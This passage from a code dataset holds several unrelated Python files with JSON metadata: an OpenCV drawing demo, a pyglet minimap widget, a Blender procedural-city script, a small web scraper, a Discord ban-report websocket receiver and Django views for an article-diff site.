left point), (bottom right point), (color), linewidth)\ncv2.rectangle(img, (15, 25), (200, 150), (150, 100, 200), 5)\n# arguments (where, (center.x, center.y), radius, (color, -1: fill))\ncv2.circle(img, (100, 64), 55, (0, 0, 0), -1)\n\n# Polygon\npoints = np.array([[10, 5], [20, 30], [70, 20], [50, 10]], np.int32)\n# OpenCV suggests reshaping the array\npoints = points.reshape((-1, 1, 2))\n# True: whether or not we want to connect the first point to the last\ncv2.polylines(img, [points], True, (0, 255, 255), 3)\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n# font: uses the font specified above, 1: size, 2: line thickness, AA: anti-aliasing\ncv2.putText(img, 'OpenCV', (0, 130), font, 1, (200, 255, 255), 2, cv2.LINE_AA)\ncv2.imshow('Github', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()", "sub_path": "opencv_draw.py", "file_name": "opencv_draw.py", "file_ext": "py", "file_size_in_byte": 1117, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "cv2.imread", "line_number": 4, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 4, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.polylines", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "224233725", "text": "\nimport widgets\nfrom pyglet import event\nfrom pyglet import gl\nfrom pyglet import graphics\nfrom pyglet.window import mouse\n\n# FIXME look into rendering minimap as a texture\n\nclass MinimapPoints(object):\n\n def __init__(self, bg_color, x, y, width, height, scale=2):\n self._cs = dict()\n self._batch = graphics.Batch()\n self._height = height\n self.scale = scale\n self._scale2 = scale ** 2\n npnts = self._scale2 * width * height\n\n _get_xy = lambda u, v: \\\n (p for xy in ((scale*u+x+dx, scale*v+y+dy) for dx in xrange(scale) for dy in xrange(scale)) for p in xy)\n xy = (_get_xy(u, v) for u in xrange(width) for v in xrange(height))\n xy = [p for xy_ in xy for p in xy_] # flatten\n\n self._vl = self._batch.add(npnts, gl.GL_POINTS, None, ('v2i', xy),\n ('c4f', bg_color*(npnts)))\n self._nvertices = 1\n self._added = set()\n\n def set_color(self, u, v, c):\n i = 4 * self._scale2 * (self._height * u + v)\n if i not in self._added:\n self._vl.colors[i:i+4*self._scale2] = c * self._scale2\n self._added.add(i)\n\n def draw(self):\n self._batch.draw()\n\n\nclass MiniMap(widgets.Widget):\n\n def __init__(self, tilemap, player_color=(0, 0, 1), scale=2, alpha=1.0, *args, **kwargs):\n super(MiniMap, self).__init__(*args, **kwargs)\n self.tilemap = tilemap\n self.player_color = \\\n (player_color[0], player_color[1], player_color[2], alpha)\n self.width = scale * self.tilemap.width\n self.height = scale * self.tilemap.height\n self.scale = scale\n self.alpha = alpha\n self._pnts = None\n\n def show_at(self, x, y):\n super(MiniMap, self).show_at(x, y)\n if not self._pnts:\n self._pnts = MinimapPoints((0.2, 0.2, 0.3, self.alpha), self.x, self.y, self.tilemap.width,\n self.tilemap.height, self.scale)\n\n def draw_ui(self):\n gl.glColor4f(1, 1, 1, self.alpha)\n x0, y0, x1, y1 = self.x - 1, self.y - 1, \\\n self.x + self.width + 1, self.y + self.height + 1\n graphics.draw(4, gl.GL_LINE_LOOP, ('v2i', (x0, y1, x1, y1, x1, y0, x0, y0))) # FIXME graphics.draw is slow\n\n # FIXME this loop may be a performace hit - alternative is to hook in to\n # TileMap.set_explored, and not update _pnts in draw_ui\n for t in self.tilemap.explored_tiles:\n x = t.x // self.tilemap.dx\n y = t.y // self.tilemap.dy\n c = list(t.minimap_color)\n c.append(self.alpha)\n self._pnts.set_color(x, y, c)\n\n self._pnts.draw()\n\n gl.glColor4f(*self.player_color)\n punits = self.tilemap.units['PlayerUnit']\n ps = list()\n for p in punits:\n x = self.scale * p.x // self.tilemap.dx + self.x\n y = self.scale * p.y // self.tilemap.dy + self.y\n ps.extend([c for xy in ((x+dx, y+dy) for dx in xrange(self.scale)\n for dy in xrange(self.scale)) for c in xy])\n graphics.draw(len(ps)//2, gl.GL_POINTS, ('v2i', ps)) # FIXME graphics.draw is slow\n\n gl.glColor4f(1, 1, 1, self.alpha)\n p = self.tilemap.selected_tile\n x = self.scale * p.x // self.tilemap.dx + self.x\n y = self.scale * p.y // self.tilemap.dy + self.y\n ps = [c for xy in ((x+dx, y+dy) for dx in xrange(self.scale) for dy in\n xrange(self.scale)) for c in xy]\n graphics.draw(len(ps)//2, gl.GL_POINTS, ('v2i', ps)) # FIXME graphics.draw is slow\n\n gl.glColor4f(1, 0, 0, self.alpha)\n x = self.x + self.scale * self.tilemap.window.x // self.tilemap.window.dx\n y = self.y + self.scale * self.tilemap.window.y // self.tilemap.window.dy\n width = self.scale * self.tilemap.window.width // self.tilemap.window.dx\n height = self.scale * self.tilemap.window.height // self.tilemap.window.dx\n x0, y0, x1, y1 = x - 1, y - 1, x + width + 1, y + height + 1\n graphics.draw(4, gl.GL_LINE_LOOP, ('v2i', (x0, y1, x1, y1, x1, y0, x0, y0))) # FIXME graphics.draw is slow\n\n # FIXME make drag\n def on_mouse_press(self, x, y, button, modifiers):\n if button == mouse.LEFT and modifiers == 0:\n if (self.x <= x <= self.x+self.width) and \\\n (self.y <= y <= self.y+self.height):\n u = (x - self.x) // self.scale\n v = (y - self.y) // self.scale\n self.tilemap.center_on(u, v)\n return event.EVENT_HANDLED\n if button == mouse.RIGHT and modifiers == 0:\n if (self.x <= x <= self.x+self.width) and \\\n (self.y <= y <= self.y+self.height):\n u = (x - self.x) // self.scale\n v = (y - self.y) // self.scale\n self.tilemap.move_tile(u, v)\n return event.EVENT_HANDLED\n\n\n\n", "sub_path": "src/minimap.py", "file_name": "minimap.py", "file_ext": "py", "file_size_in_byte": 4874, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pyglet.graphics.Batch", "line_number": 14, "usage_type": "call"}, {"api_name": "pyglet.graphics", "line_number": 14, "usage_type": "name"}, {"api_name": "pyglet.gl.GL_POINTS", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pyglet.gl", "line_number": 25, "usage_type": "name"}, {"api_name": "widgets.Widget", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pyglet.gl.glColor4f", "line_number": 60, "usage_type": "call"}, {"api_name": "pyglet.gl", "line_number": 60, "usage_type": "name"}, {"api_name": "pyglet.graphics.draw", "line_number": 63, "usage_type": "call"}, {"api_name": "pyglet.graphics", "line_number": 63, "usage_type": "name"}, {"api_name": "pyglet.gl.GL_LINE_LOOP", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pyglet.gl", "line_number": 63, "usage_type": "name"}, {"api_name": "pyglet.gl.glColor4f", "line_number": 76, "usage_type": "call"}, {"api_name": "pyglet.gl", "line_number": 76, "usage_type": "name"}, {"api_name": "pyglet.graphics.draw", "line_number": 84, "usage_type": "call"}, {"api_name": "pyglet.graphics", "line_number": 84, "usage_type": "name"}, {"api_name": "pyglet.gl.GL_POINTS", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pyglet.gl", "line_number": 84, "usage_type": "name"}, {"api_name": "pyglet.gl.glColor4f", "line_number": 86, "usage_type": "call"}, {"api_name": "pyglet.gl", "line_number": 86, "usage_type": "name"}, {"api_name": "pyglet.graphics.draw", "line_number": 92, "usage_type": "call"}, {"api_name": "pyglet.graphics", "line_number": 92, "usage_type": "name"}, {"api_name": "pyglet.gl.GL_POINTS", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pyglet.gl", "line_number": 92, "usage_type": "name"}, {"api_name": "pyglet.gl.glColor4f", "line_number": 94, "usage_type": "call"}, {"api_name": "pyglet.gl", "line_number": 94, "usage_type": "name"}, {"api_name": "pyglet.graphics.draw", "line_number": 100, "usage_type": "call"}, {"api_name": "pyglet.graphics", "line_number": 100, "usage_type": "name"}, {"api_name": "pyglet.gl.GL_LINE_LOOP", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pyglet.gl", "line_number": 100, "usage_type": "name"}, {"api_name": "pyglet.window.mouse.LEFT", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pyglet.window.mouse", "line_number": 104, "usage_type": "name"}, {"api_name": "pyglet.event.EVENT_HANDLED", "line_number": 110, "usage_type": "attribute"}, {"api_name": "pyglet.event", "line_number": 110, "usage_type": "name"}, {"api_name": "pyglet.window.mouse.RIGHT", "line_number": 111, "usage_type": "attribute"}, {"api_name": "pyglet.window.mouse", "line_number": 111, "usage_type": "name"}, {"api_name": "pyglet.event.EVENT_HANDLED", "line_number": 117, "usage_type": "attribute"}, {"api_name": "pyglet.event", "line_number": 117, "usage_type": "name"}]} +{"seq_id": "245655827", "text": "import sys, os\nsys.path.append('.')\nfrom primaryStreets import PrimaryStreets\nfrom secundaryStreets import SecundaryStreets\nfrom sidewalk import Sidewalk\nfrom subdivision import Subdivision\nfrom building import Building\nfrom greenZone import GreenZone\nfrom random import randint, uniform\nfrom mathutils import Vector\nfrom auxiliarFunctions import *\n\ngrammars=[\"building1.grammar\",\"building2.grammar\"] #Grammars to the buildings\n\n\n\n#===========TO TRY JUST A BUILDING==========#\ncurrent_directory = './libraries'\nsys.path.append((current_directory))\nfrom lsystem import Grammar\nfrom ProceduralGeometry import Designer, Geometry\nimport bpy, bmesh\n#==========================================#\n\ndef lookAt(camera, pos):\n direction = pos-camera.location\n rot_quat = direction.to_track_quat('-Z', 'Y')\n camera.rotation_euler = rot_quat.to_euler()\n\n#Generation of a city in real-time\n#Stages:\n# 1 - Creating the primary streets\n# 2 - Creating the secundary streets\n# 3 - Subdivision of the neighborhoods\n# 4 - Creating the buildings\n# 5 - Texturing\n#\n#Parameters:\n# - x: x size between where the city will be (from -x to x on the X axis)\n# - y: y size between where the city will be (from -y to y on the Y axis)\n# - primaryprimaryStreetSize: size of the primary streets\n# - secundaryStreetSize: size of the secondary streets\n# - districtHeight(just Voronoi Algorithm): height of the district\n# - districtWidth(just Voronoi Algorithm): width of the district\n# - neighborhoodHeight: height of the neighborhood where the buildings will be placed\n# - neighborhoodWidth: width of the neighborhood where the buildings will be placed\n# - maxAreaBuilding: maximum area to the floor of a building\n# - minAreaBuilding: minimum area to the floor of a building\n# - densityFactor(just Random Streets Algorithm): factor of density to the primary streets (more densityFactor increase the density) \ndef city(x,y,primaryStreetSize,secundaryStreetSize,districtHeihgt,districtWidth,neighborhoodHeight,neighborhoodWidth,maxAreaBuilding,minAreaBuilding,densityFactor,greenZone,UVtexturing):\n \n #Stage 1: primary streets and adding material and texture\n p = PrimaryStreets(x,y,primaryStreetSize,densityFactor,districtHeihgt,districtWidth)\n p.material()\n \n #Stage 2: secundary streets and adding material and texture\n s = SecundaryStreets(x,y,p.district,secundaryStreetSize,neighborhoodHeight,neighborhoodWidth)\n s.material()\n \n #Stage 3: subdivision of neighborhoods, one by one\n for n in s.neighborhoods:\n percentageZoneWithoutBuidings = greenZone\n randomPercentage = uniform(0.0,1.0) \n \n #Making sidewalks and adding material and texture\n sidewalk = Sidewalk(n)\n if UVtexturing == 1:\n sidewalk.material2()\n else:\n sidewalk.material()\n \n if randomPercentage <= percentageZoneWithoutBuidings:\n g = GreenZone(sidewalk.face)\n g.material()\n else: \n #Subdivision to make the floor of the buildings\n n = Subdivision(sidewalk.face, maxAreaBuilding, minAreaBuilding)\n \n maxDistance = dist([0,0,0],[x,y,0])/4 #Distance from the center (0,0,0) where the buildings will be taller\n \n #Create a building in each floor and adding material and texture\n for i in n.faces:\n if len(i) != 3: \n buildingVertices = []\n for j in i:\n buildingVertices.append(n.vertices[j])\n \n #Check if the building is in the center of the city\n centerLocalization = 0\n for j in buildingVertices:\n if dist([0,0,0],j) < maxDistance:\n centerLocalization += 1\n else:\n break\n \n if centerLocalization == len(buildingVertices):\n b = Building(grammars[1],randint(2,10),buildingVertices)\n if UVtexturing == 1:\n b.material2(randint(0,5))\n else:\n b.material(randint(0,5))\n #b.material(randint(0,1))\n else:\n b = Building(grammars[0],2,buildingVertices)\n if UVtexturing == 1:\n b.material2(0)\n else:\n b.material(0)\n \n #Light for the scene \n sun=bpy.ops.object.lamp_add(type='SUN', view_align=False, location=(50, 50, 200), rotation=(0,0,0)) \n sun=bpy.data.objects[\"Sun\"]\n sun.data.energy=4\n\n lookAt(sun,(Vector((0,0,0))))\n \n \n \n \n#==========================JUST TO TRY A BUILDING===============================\n\n #==============================================================================\n # vertices = [[-1.35524,2.00595,0.1],\n # [-1.35524,-2.0371,0.1],\n # [1.17439,-2.0371,0.1],\n # [1.56847,1.25557,0.1],\n # [0.92263,2.00595,0.1]]\n # \n # auxVertices = []\n # center = centroid_of_polygon(vertices)\n # center.append(0)\n # for v in vertices:\n # auxVertices.append([v[0]-center[0],v[1]-center[1],v[2]-center[2]])\n # \n # d = Designer(auxVertices)\n # \n # d.generateGeometry('EEP')\n # mesh=bpy.data.meshes.new(\"l-system mesh\")\n # object=bpy.data.objects.new(\"l-system object\",mesh)\n # object.location= center\n # bpy.context.scene.objects.link(object)\n # mesh.from_pydata(d.vertices,[],d.faces)\n # mesh.update(calc_edges=True)\n #==============================================================================\n\n#=============================================================================== \n \nxDimension = None\nyDimension = None\nprimaryStreetSize = None\nsecondaryStreetSize = None\ndistrictHeihgt = None\ndistrictWidth = None\nneighborhoodHeight = None\nneighborhoodWidth = None\nmaxAreaBuilding = None\nminAreaBuilding = None\ndensityFactor = None\ngreenZone = None\nUV = None\n \nf = open(\"controlParameters.txt\", \"r\")\n \nfor line in f:\n params = line.split()\n if params[0]=='x':\n xDimension = float(params[1])\n elif params[0] == 'y':\n yDimension = float(params[1])\n elif params[0] == 'Primary_street_size':\n primaryStreetSize = float(params[1])\n elif params[0] == 'Secondary_street_size':\n secondaryStreetSize = float(params[1])\n elif params[0] == 'District_height':\n districtHeihgt = float(params[1])\n elif params[0] == 'District_width':\n districtWidth = float(params[1])\n elif params[0] == 'Neighborhood_height':\n neighborhoodHeight = float(params[1])\n elif params[0] == 'Neighborhood_width':\n neighborhoodWidth = float(params[1])\n elif params[0] == 'Maximum_buidings_area':\n maxAreaBuilding = float(params[1])\n elif params[0] == 'Minimum_buidings_area':\n minAreaBuilding = float(params[1])\n elif params[0] == 'Density':\n densityFactor = float(params[1])\n elif params[0] == 'Green_zone':\n greenZone = float(params[1])\n elif params[0] == 'UV':\n UV = float(params[1])\n \nif(xDimension != None and\n yDimension != None and\n primaryStreetSize != None and\n secondaryStreetSize != None and\n districtHeihgt != None and\n districtWidth != None and\n neighborhoodHeight != None and\n neighborhoodWidth != None and\n maxAreaBuilding != None and\n minAreaBuilding != None and\n densityFactor != None and\n greenZone != None and\n UV != None):\n if UV == 1: \n city(xDimension,\n yDimension,\n primaryStreetSize,\n secondaryStreetSize,\n districtHeihgt,\n districtWidth,\n neighborhoodHeight,\n neighborhoodWidth,\n maxAreaBuilding,\n minAreaBuilding,\n densityFactor,\n greenZone,\n 1)\n else:\n city(xDimension,\n yDimension,\n primaryStreetSize,\n secondaryStreetSize,\n districtHeihgt,\n districtWidth,\n neighborhoodHeight,\n neighborhoodWidth,\n maxAreaBuilding,\n minAreaBuilding,\n densityFactor,\n greenZone,\n 0)\nelse:\n print('Parameter Error: some parameters are invalid')\n", "sub_path": "city.py", "file_name": "city.py", "file_ext": "py", "file_size_in_byte": 8580, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "primaryStreets.PrimaryStreets", "line_number": 53, "usage_type": "call"}, {"api_name": "secundaryStreets.SecundaryStreets", "line_number": 57, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 63, "usage_type": "call"}, {"api_name": "sidewalk.Sidewalk", "line_number": 66, "usage_type": "call"}, {"api_name": "sidewalk.material2", "line_number": 68, "usage_type": "call"}, {"api_name": "sidewalk.material", "line_number": 70, "usage_type": "call"}, {"api_name": "greenZone.GreenZone", "line_number": 73, "usage_type": "call"}, {"api_name": "sidewalk.face", "line_number": 73, "usage_type": "attribute"}, {"api_name": "subdivision.Subdivision", "line_number": 77, "usage_type": "call"}, {"api_name": "sidewalk.face", "line_number": 77, "usage_type": "attribute"}, {"api_name": "building.Building", "line_number": 97, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 97, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 99, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 101, "usage_type": "call"}, {"api_name": "building.Building", "line_number": 104, "usage_type": "call"}, {"api_name": "bpy.ops.object.lamp_add", "line_number": 111, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 111, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 112, "usage_type": "attribute"}, {"api_name": "mathutils.Vector", "line_number": 115, "usage_type": "call"}]} +{"seq_id": "506780611", "text": "from bs4 import BeautifulSoup\nfrom bs4 import SoupStrainer\n\nimport requests\n\nimport csv\n\nwith open(\"Log_Links_3.csv\",\"r\") as links:\n with open('OTRSiteScrape2.txt','w') as outfile: \n\n show_links = []\n \n for row in links:\n show_links.append(row)\n \n link = iter(show_links)\n num_links = len(show_links)\n \n url = show_links[0]\n print(url)\n object_page = requests.get(url)\n html = object_page.text\n \n soup = BeautifulSoup(html, \"html5lib\")\n only_font_tags = SoupStrainer(\"font\") \n \n font_3 = soup.find_all(\"font\", attrs={\"size\":\"3\"})\n font_5 = soup.find_all(\"font\", attrs={\"size\":\"5\"})\n font_3_string = str(font_3)\n font_5_string = str(font_5)\n \n if font_5:\n outfile.write(font_5_string)\n outfile.write(font_3_string)\n # print(font_5_string)\n \n try:\n url = next(link)\n print(url)\n except:\n print (\"error\")\n \n ", "sub_path": "Extras/V4_OTRSite_Log_Scrape_Pt_2.py", "file_name": "V4_OTRSite_Log_Scrape_Pt_2.py", "file_ext": "py", "file_size_in_byte": 1077, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 24, "usage_type": "call"}, {"api_name": "bs4.SoupStrainer", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "453406266", "text": "\"\"\"\nWebsocket receiver class.\n\"\"\"\nimport json\n\nimport discord\nimport websockets\nfrom dbansbot import consts\n\n\ndef create_message(report: dict, server: discord.Server):\n \"\"\"\n Creates a message to send from report data.\n \"\"\"\n # Create the message to send.\n msg = \"\"\"**{type_} | Number #{data[number]}\\u200b**\n**Victim**: {victim}\n\"\"\"\n # Get the fields.\n type_ = consts.ReportType(report[\"type\"]).name.capitalize()\n # Check if the report is 'active' and the type is ban.\n # If it isn't, the type is actually 'unban'.\n # Get the victim details.\n _victim = server.get_member(str(report[\"victim\"][\"discord_id\"]))\n if _victim is None:\n # Use the state instead.\n uname = report.get(\"state\", {}).get(\"username\", \"Unknown...\")\n discrim = report.get(\"state\", {}).get(\"discriminator\", \"????\")\n victim = \"{}#{}\".format(uname, discrim)\n else:\n victim = str(_victim)\n\n built = msg.format(data=report, type_=type_, victim=str(victim))\n\n # Check if there's an owner key.\n if report[\"owner\"][\"discord_id\"] is None:\n built += \"Responsible moderator, please claim with `==| reports claim {} `\\n\".format(\n report[\"number\"])\n else:\n owner = server.get_member(str(report[\"owner\"][\"discord_id\"]))\n built += \"**Owner:** {}\\n\".format(str(owner))\n built += \"**Reason:** {}\".format(report[\"reason\"])\n\n return built\n\n\nclass WSReceiver:\n def __init__(self, bot):\n self.bot = bot\n\n self.ws = None\n\n async def check_server_audit(self, server: discord.Server):\n \"\"\"\n Checks to see if this server is eligible for audit log.\n\n Returns a two-item tuple:\n If eligible (bool)\n The channel object if eligible\n \"\"\"\n default = (False, None)\n\n # Check settings.\n status, js = await self.bot.get_api(\n consts.API_SETTINGS.format(server_id=server.id)\n )\n if status != 200:\n # Server probably isn't set up\n return default\n\n # Check the audit log status.\n settings = js[\"settings\"]\n audit_enabled = settings[\"audit\"][\"enabled\"]\n if not audit_enabled:\n # No audit log.\n return default\n\n # Load the audit log channel.\n channel = server.get_channel(str(settings[\"audit\"][\"id\"]))\n if channel is None:\n return default\n\n return True, channel\n\n async def dirty(self, dirty_data: list):\n \"\"\"\n Handles \"dirty\" objects.\n \"\"\"\n for report in dirty_data:\n assert isinstance(report, dict)\n\n # Get the server object.\n server = self.bot.get_server(str(report[\"discord_server_id\"]))\n if server is None:\n # ???\n continue\n\n eligible, channel = await self.check_server_audit(server)\n if not eligible:\n continue\n\n built = create_message(report, server)\n\n async for message in self.bot.logs_from(channel, limit=999999999):\n if 'Number #{}\\u200b'.format(report[\"number\"]) in message.content:\n # Edit the message w/ the new content.\n await self.bot.edit_message(message, built)\n return\n\n # If the old message couldn't be found, make a new message.\n await self.bot.send_message(channel, built)\n\n async def new(self, new_data: list):\n \"\"\"\n Handles \"new\" objects.\n \"\"\"\n for report in new_data:\n assert isinstance(report, dict)\n\n # Get the server object.\n server = self.bot.get_server(str(report[\"discord_server_id\"]))\n if server is None:\n # ???\n continue\n\n eligible, channel = await self.check_server_audit(server)\n if not eligible:\n continue\n\n built = create_message(report, server)\n # Send the message.\n await self.bot.send_message(channel, built)\n\n async def received(self, data: dict):\n data = data[\"data\"]\n\n dirty = data.get(\"dirty\", [])\n new = data.get(\"new\", [])\n\n # Process the dirty and new data as appropriate.\n await self.new(new)\n await self.dirty(dirty)\n\n async def poll(self):\n \"\"\"\n Poll repeatedly for new reports.\n \"\"\"\n while True:\n try:\n data = await self.ws.recv()\n except websockets.ConnectionClosed:\n self.bot.logger.error(\"Websocket closed connection! Cannot receive any more websocket data.\")\n return\n # Unpack the data.\n unpacked = json.loads(data)\n await self.received(unpacked)\n\n async def open_connection(self, url: str):\n \"\"\"\n Opens a connection to the websocket emitter.\n \"\"\"\n self.bot.logger.info(\"Connecting to {} as a listener...\".format(url))\n connection = await websockets.connect(url)\n\n if self.bot.shard_id is not None:\n id = \"dbans_bot_{}\".format(self.bot.shard_id)\n else:\n id = \"dbans_bot_0\"\n\n # Get the hello.\n await connection.recv()\n # Send an identify.\n await connection.send(json.dumps({\"token\": self.bot._api_token, \"subscribe\": [\"ALL\"], \"id\": id}))\n # Receive the OK.\n await connection.recv()\n self.bot.logger.info(\"Established websocket connection.\")\n\n self.ws = connection\n\n # Start polling.\n await self.poll()\n", "sub_path": "dbansbot/websocketr.py", "file_name": "websocketr.py", "file_ext": "py", "file_size_in_byte": 5600, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "discord.Server", "line_number": 11, "usage_type": "attribute"}, {"api_name": "dbansbot.consts.ReportType", "line_number": 20, "usage_type": "call"}, {"api_name": "dbansbot.consts", "line_number": 20, "usage_type": "name"}, {"api_name": "discord.Server", "line_number": 53, "usage_type": "attribute"}, {"api_name": "dbansbot.consts.API_SETTINGS.format", "line_number": 65, "usage_type": "call"}, {"api_name": "dbansbot.consts.API_SETTINGS", "line_number": 65, "usage_type": "attribute"}, {"api_name": "dbansbot.consts", "line_number": 65, "usage_type": "name"}, {"api_name": "websockets.ConnectionClosed", "line_number": 151, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 155, "usage_type": "call"}, {"api_name": "websockets.connect", "line_number": 163, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 173, "usage_type": "call"}]} +{"seq_id": "421188067", "text": "import datetime\nimport re\n\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom models import Article\nimport models\nimport simplejson\nfrom django.http import HttpResponse, HttpResponseRedirect\n\n\nOUT_FORMAT = '%B %d, %Y at %l:%M%P EDT'\n\ndef browse(request):\n articles = []\n models._refresh_metadata()\n for article in Article.objects.all():\n url = article.url\n if 'blogs.nytimes.com' in url: #XXX temporary\n continue\n elif 'editions.cnn.com' in url:\n continue\n vs = article.versions()\n nc = len(vs)\n if nc < 2:\n continue\n rowinfo = []\n lastcommit = None\n for date, commit in vs:\n if lastcommit is None:\n diffl = ''\n else:\n diffl = '../diffview?url=%s&v1=%s&v2=%s' % (url, lastcommit, commit)\n link = '../view?url=%s&v=%s' % (url, commit)\n rowinfo.append((link, diffl, date))\n lastcommit = commit\n rowinfo.reverse()\n (date, title, byline, publication) = article.metadata()\n articles.append((url, date, title, byline, publication, nc, rowinfo))\n articles.sort(key = lambda x: (x[-2] > 1, x[-1][0][2]), reverse=True)\n return render_to_response('browse.html', {'articles': articles})\n\n\ndef diffview(request):\n url = request.REQUEST.get('url')\n v1 = request.REQUEST.get('v1')\n v2 = request.REQUEST.get('v2')\n article = Article.objects.get(url=url)\n text1 = article.get_version(v1)\n text2 = article.get_version(v2)\n #url_template = 'view?url='+url+'&v=%s'\n title = article.metadata()[1]\n\n versions = article.versions()\n #index1 = [i for i, x in enumerate(versions) if x[1] == v1][0]\n #index2 = [i for i, x in enumerate(versions) if x[1] == v2][0]\n\n date1 = models.get_commit_date(v1).strftime(OUT_FORMAT)\n date2 = models.get_commit_date(v2).strftime(OUT_FORMAT)\n\n earlier1 = 1\n\n return render_to_response('diffview_templated.html', {\n 'title': title,\n 'date1':date1, 'date2':date2,\n 'text1':text1, 'text2':text2,\n 'article_url': url, 'v1': v1, 'v2': v2,\n 'form_action': 'upvote',\n })\n\ndef view(request):\n url = request.REQUEST.get('url')\n v = request.REQUEST.get('v')\n article = Article.objects.get(url=url)\n text = article.get_version(v)\n return HttpResponse(text, content_type='text/plain;charset=utf-8')\n\ndef upvote(request):\n article_url = request.REQUEST.get('article_url')\n diff_v1 = request.REQUEST.get('diff_v1')\n diff_v2 = request.REQUEST.get('diff_v2')\n remote_ip = request.META.get('REMOTE_ADDR')\n article_id = Article.objects.get(url=article_url).id\n models.Upvote(article_id=article_id, diff_v1=diff_v1, diff_v2=diff_v2, creation_time=datetime.datetime.now(), upvoter_ip=remote_ip).save()\n return render_to_response('upvote.html')\n \n\ndef about(request):\n return render_to_response('about.html', {})\n\ndef examples(request):\n return render_to_response('examples.html', {})\n\ndef contact(request):\n return render_to_response('contact.html', {})\n\ndef front(request):\n return render_to_response('front.html', {})\n\ndef subscribe(request):\n return render_to_response('subscribe.html', {})\n", "sub_path": "website/frontend/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3287, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "models._refresh_metadata", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Article.objects.all", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Article.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Article", "line_number": 16, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Article.objects.get", "line_number": 47, "usage_type": "call"}, {"api_name": "models.Article.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.Article", "line_number": 47, "usage_type": "name"}, {"api_name": "models.get_commit_date", "line_number": 57, "usage_type": "call"}, {"api_name": "models.get_commit_date", "line_number": 58, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 62, "usage_type": "call"}, {"api_name": "models.Article.objects.get", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Article.objects", "line_number": 73, "usage_type": "attribute"}, {"api_name": "models.Article", "line_number": 73, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 75, "usage_type": "call"}, {"api_name": "models.Article.objects.get", "line_number": 82, "usage_type": "call"}, {"api_name": "models.Article.objects", "line_number": 82, "usage_type": "attribute"}, {"api_name": "models.Article", "line_number": 82, "usage_type": "name"}, {"api_name": "models.Upvote", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 83, "usage_type": "attribute"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 84, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 88, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 91, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 94, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 97, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "440323037", "text": "# -*- coding: utf-8 -*-\nfrom django.conf.urls import patterns, include, url\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('main.views',\n\t(r'^grappelli/', include('grappelli.urls')),\n\t(r'^admin/', include(admin.site.urls)),\n\t#main page\n\turl(r'^$', 'index_view',\n\t\t{'template_name':'main/index.html'},\n\t\tname='catalog_home'),\n\t# List of 